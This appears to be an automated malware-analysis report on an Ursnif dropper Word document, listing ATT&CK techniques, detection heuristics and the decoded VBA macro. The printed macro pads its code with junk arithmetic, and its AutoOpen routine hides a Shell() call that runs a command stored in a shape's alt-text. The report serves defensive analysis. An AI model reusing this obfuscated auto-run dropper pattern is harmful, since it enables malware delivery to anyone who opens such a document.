Verdict: MALICIOUS (Risk Score 202)

Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Ursnif-6864686-0', indicating a known Ursnif variant. The presence of a critical 'Shell()' call within the VBA macros, specifically triggered by the 'AutoOpen' function, strongly suggests the macro is intended to execute arbitrary commands. This functionality is typical for droppers that download and execute further malicious stages.
Heuristics (6)
- ClamAV: Doc.Dropper.Ursnif-6864686-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3412 bytes |

SHA-256 (macros.bas): 243b68023a1832a04cc334973c6dde46ce7b33ed2a87ac5b1029254f28367f4b
Preview script: first 1,000 lines of the extracted script. The decoded source, as recovered by olevba, consists almost entirely of unused filler arithmetic; the functional part is the AutoOpen routine, which resolves a document shape by name and passes its AlternativeText to Shell() with the window hidden.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wjohoty"
Function zwyvagaquv()
    Dim uxqutZXf As Integer
    Dim nZOCxMfS As Long
    uxqutZXf = 6438 + 5413
    Dim pDAeeV As Integer
    Dim MpljD As Long
    pDAeeV = 3969 + 2089
    Dim RIhth As Integer
    Dim rwemiwowy As Long
    RIhth = 6519 + 6069
    Dim bSxkMShz As Integer
    Dim pGxsV As Long
    bSxkMShz = 2305 + 2860
    Dim XjfzK As Integer
    Dim qmygali As Long
    XjfzK = 6881 + 6590
    Dim htih As Integer
    Dim RGxJvC As Long
    htih = 9303 + 8776
    Dim nczHY As Integer
    Dim KiMNQO As Long
    nczHY = 5269 + 2935
    Dim qfija As Integer
    Dim dwocan As Long
    qfija = 4668 + 5466
    Dim gfebekito As Integer
    Dim kgatyqud As Long
    gfebekito = 9269 + 8141
    bjov = "szupocaru"
    Dim xtyqubolik As Integer
    Dim pgic As Long
    xtyqubolik = 6999 + 1620
    Dim djehugo As Integer
    Dim bgiq As Long
    djehugo = 1631 + 7990
    Dim vvanawozy As Integer
    Dim rtawac As Long
    vvanawozy = 7213 + 4709
    Dim vropefusebu As Integer
    Dim ckubiwup As Long
    vropefusebu = 2357 + 9097
    Dim gresowu As Integer
    Dim CdrjUMB As Long
    gresowu = 9046 + 6312
    Dim mfusakabu As Integer
    Dim WlvNjhN As Long
    mfusakabu = 3437 + 6494
    Dim bpuzozexi As Integer
    Dim sdajipami As Long
    bpuzozexi = 1801 + 2179
    Dim pDARX As Integer
    Dim JIlHSk As Long
    pDARX = 4720 + 2534
    Dim WUDSMM As Integer
    Dim oODqIrs As Long
    WUDSMM = 4775 + 3528
    Set zwyvagaquv = ActiveDocument.Shapes(bjov)
End Function

Sub AutoOpen()
    Dim BBqkrlf As Integer
    Dim qjum As Long
    BBqkrlf = 5417 + 4007
    Dim zfivyxapa As Integer
    Dim gquhirisy As Long
    zfivyxapa = 1788 + 8559
    Dim EFlZfrao As Integer
    Dim qhuc As Long
    EFlZfrao = 6599 + 4483
    Dim vkemukezoq As Integer
    Dim nmxVsYpH As Long
    vkemukezoq = 7385 + 9310
    Dim FlhJu As Integer
    Dim qloxyc As Long
    FlhJu = 3537 + 4109
    Dim fgiqonimofe As Integer
    Dim ssucawejeje As Long
    fgiqonimofe = 8650 + 9316
    Set msynirepy = zwyvagaquv
    Dim gwewetohy As Integer
    Dim AHkGoQhV As Long
    gwewetohy = 5921 + 7747
    Dim cyyhCEuv As Integer
    Dim TUedbL As Long
    cyyhCEuv = 6535 + 5152
    Dim wcuduhutywe As Integer
    Dim RzRFdLiY As Long
    wcuduhutywe = 6911 + 7826
    Interaction.Shell$ _
        msynirepy.AlternativeText, vbHide
    Dim QLQew As Integer
    Dim wtymo As Long
    QLQew = 4456 + 7847
    Dim rsysutemefa As Integer
    Dim jqecu As Long
    rsysutemefa = 5838 + 1792
    Dim QjjBof As Integer
    Dim gXLJPRxC As Long
    QjjBof = 7786 + 1883
    Dim gYtWMi As Integer
    Dim YfxmXGV As Long
    gYtWMi = 6712 + 5707
    Dim lcXeA As Integer
    Dim sbaqel As Long
    lcXeA = 7895 + 8340
    Dim nnuxowon As Integer
    Dim xbapadivuvi As Long
    nnuxowon = 2233 + 1810
    Dim rpAoR As Integer
    Dim oUDtZyCg As Long
    rpAoR = 5602 + 6312
    Dim zhyxu As Integer
    Dim ctan As Long
    zhyxu = 7212 + 8242
    Dim rkuruvy As Integer
    Dim smysisug As Long
    rkuruvy = 3954 + 1328
    Dim afhpipk As Integer
    Dim hkycy As Long
    afhpipk = 3887 + 5835
    Dim wtapasel As Integer
    Dim vJhHxdS As Long
    wtapasel = 6006 + 8804
    Dim hxopotu As Integer
    Dim ZNzpSv As Long
    hxopotu = 8870 + 2018
End Sub
```